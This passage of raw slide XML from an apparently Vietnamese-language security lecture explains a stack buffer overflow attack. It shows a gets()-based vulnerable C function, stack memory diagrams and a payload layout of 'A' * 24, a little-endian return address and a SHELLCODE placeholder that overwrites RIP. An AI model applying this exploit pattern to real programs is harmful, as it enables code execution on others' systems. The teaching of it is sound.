              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B2D919-FA5F-DCBD-230E-8762228EA3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1905928067"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5753104" y="1219200"/>
          <a:ext cx="2714397" cy="458036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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'\x00'</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'\x40'</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'\xcd'</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'\xff'</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'\xbf'</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SHELLCODE</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SHELLCODE</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SHELLCODE</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;784;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39CE6C4B-D13E-70B8-0FE0-E4A817D007C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8158200" y="4851735"/>
            <a:ext cx="1228800" cy="4002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600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Google Shape;785;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A81C2E2F-C0F0-6E47-AC82-0352902DD064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="4285035"/>
            <a:ext cx="0" cy="483300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Google Shape;786;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E39D18C-8E4F-6DC5-B8EB-07F443E4EBAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="5325435"/>
            <a:ext cx="0" cy="474125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B876F8BE-A72B-5937-B349-955936378E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3608904"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276DC999-BB73-B98C-7A1F-99DB64563CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3899173"/>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SFP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Google Shape;840;p71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A1D609-ED24-EBE7-82F5-0953F481B80E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4014666832"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4421307" y="3361480"/>
          <a:ext cx="1439950" cy="2438080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2914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152550">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>0xbfffcd5c</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0xbfffcd58</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0xbfffcd54</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0xbfffcd50</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0xbfffcd4c</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0xbfffcd48</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0xbfffcd44</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52550">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>0xbfffcd40</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08EF9AB-67F0-70C8-4CAA-B34014C8C4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4953000" y="3827835"/>
            <a:ext cx="800104" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>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A7907C0C-BD1B-36A5-3C4F-3BED7A22CC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4953000" y="3818235"/>
            <a:ext cx="0" cy="1838400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE02D36-28CA-FCDF-B933-651FD18BC3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5656635"/>
            <a:ext cx="800104" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;782;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14D1F245-B876-A0C1-0DAD-28F996B588E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="5377754"/>
            <a:ext cx="3668699" cy="1169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void vulnerable(void) {</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char name[20];</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gets(name);</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2346035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D61B-1119-2C68-4167-B3AE72E146B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code Injection – Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ED9F66-FE48-3C7F-3356-5FAF68F09699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1066800"/>
            <a:ext cx="5190901" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>Nếu shellcode có kích thước lớn thì đặt vào sau ô nhớ chứa RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>RIP = ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>Ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'A' * 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'\x5c\xcd\xff\xbf'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SHELLCODE</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>24 byte lấp đầy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>và SFP</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>4 byte địa chỉ vùng nhớ chứa shellcode ghi đè vào ô nhớ chứa RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Nội dung Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913C2530-F4E4-9397-B9C6-8D7CC5A4BDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B2D919-FA5F-DCBD-230E-8762228EA3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="586351380"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5753104" y="1219200"/>
          <a:ext cx="2714397" cy="458036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gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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 sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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SHELLCODE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>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'\x5c'</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'\xcd'</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'\xff'</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1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'\xbf'</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="1155CC"/>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rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'A'</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;784;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39CE6C4B-D13E-70B8-0FE0-E4A817D007C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8158200" y="4851735"/>
            <a:ext cx="1228800" cy="4002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600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Google Shape;785;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A81C2E2F-C0F0-6E47-AC82-0352902DD064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="4285035"/>
            <a:ext cx="0" cy="483300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Google Shape;786;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E39D18C-8E4F-6DC5-B8EB-07F443E4EBAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="5325435"/>
            <a:ext cx="0" cy="474125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B876F8BE-A72B-5937-B349-955936378E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3608904"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;788;p67">
            <a:extLst>
